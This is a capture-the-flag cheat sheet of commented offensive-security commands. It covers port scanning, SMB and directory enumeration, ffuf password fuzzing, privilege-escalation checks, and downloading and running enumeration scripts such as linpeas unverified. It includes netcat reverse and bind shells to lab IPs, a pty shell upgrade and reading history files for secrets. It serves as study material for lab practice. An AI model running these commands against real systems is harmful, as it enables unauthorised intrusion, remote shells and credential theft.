
CTF

ping

# Send 10 echo requests and keep a copy of the output in ping.txt (tee also prints it).
# $(target) is a command substitution; presumably a helper that prints the target address — confirm, or replace with the host.
ping -c 10 $(target) | tee ping.txt

nmap

# -p-   : all 65535 TCP ports instead of nmap's default top-1000 list.
# -sC   : default NSE scripts; -sV : service/version detection.
# -Pn   : skip host discovery and scan even when the host does not answer pings.
# $(target) is presumably a helper that prints the target address — confirm.
nmap -p- $(target)
nmap -p- -sC -sV $(target)
nmap -p- -sC -sV -Pn $(target)

enum4linux

# SMB/NetBIOS enumeration with enum4linux's default checks against the target.
enum4linux $(target)

sudo -l

# List the sudo rules that apply to the current user (may prompt for the user's password).
sudo -l

cron

# System-wide cron table; per-user tables live elsewhere and are not shown by this command.
cat /etc/crontab
# - check scripts that are executed as root: can you edit them?
# - check PATH: can a script you create be executed instead of the intended one?

linpeas.sh

# Fetches the latest release asset, so the content changes between runs.
# NOTE(review): the script is executed unverified straight after download; pin a release
# and compare against a published checksum if one is available before running it.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinEnum.sh

# Pulls the master branch, not a tagged release, so the content is not pinned.
# NOTE(review): executed unverified after download; pin a commit or verify a checksum first.
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

lse.sh

# Latest release asset of linux-smart-enumeration; content changes between runs.
# NOTE(review): executed unverified after download; pin a release and verify a checksum if published.
wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
chmod +x lse.sh
./lse.sh

linux exploit suggester 2

# Pulled from the master branch (unpinned). The chmod is redundant here because the
# script is run via the perl interpreter rather than executed directly.
# NOTE(review): executed unverified after download; pin a commit or verify a checksum first.
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl

python local server

# Serve the current directory over plain HTTP on port 8000, bound to all interfaces by default.
python3 -m http.server

scp

# Copy a local file to the remote host over SSH, authenticating with the private key id_rsa.
# Example values from the page (user barry, host 10.10.230.234); substitute your own.
scp -i id_rsa /home/kali/workspace/exploit/45010 barry@10.10.230.234:/home/barry/

python shell

# Upgrade a bare shell to a pty-backed one. Same sequence twice: first with python,
# then with python3, for whichever interpreter is present.
python -c 'import pty;pty.spawn("/bin/bash")'
# Tell programs the terminal type so full-screen tools render correctly.
export TERM=xterm
# CTRL+Z is a keystroke, not a command: it suspends the foreground session in the local terminal.
CTRL+Z
# Run locally: put the local terminal in raw mode without echo, then resume the suspended session.
stty raw -echo; fg
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg

netcat nc shell

# ATTACKER:/TARGET: are labels showing which side runs each line, not shell commands.
# First pair: the attacker listens on 4444 and the target connects back (reverse shell).
ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
-- 
# Second pair: the target listens on 4444 and the attacker connects to it (bind shell).
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444

gobuster

# Directory brute force against the target URL; the second run uses a much smaller wordlist.
# $(target) is presumably a helper that prints the target URL/host — confirm.
gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirb/common.txt

autorecon

# Run autorecon's default scan set against the example address (substitute your own).
autorecon 10.10.99.99

SUID, SGID and Sticky Bits

# -perm -4000 matches anything with the setuid bit set (any file type).
find / -perm -4000 2>/dev/null
# Same bit expressed symbolically, restricted to regular files.
find / -perm -u=s -type f 2>/dev/null
# Regular files with setuid OR setgid set; ls -l prints owner/group and mode for each.
# 2>/dev/null drops the permission-denied noise from unreadable directories.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

FFUF GET & POST

# -w wordlist; -X POST with the JSON body in -d; FUZZ in -u is replaced by each word;
# -fw 2 filters out responses whose body has exactly 2 words.
ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2

History

# Shell builtin: the current session's command history.
history
# Saved history files for the shell and common tools (`less FILE` would avoid the extra cat).
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
# Glob matches every dotfile ending in "history" and concatenates them into one less view.
cat ~/.*history | less

hash

notes

  • joplin
  • xmind.net
  • cherrytree
  • keepnote

Information Gathering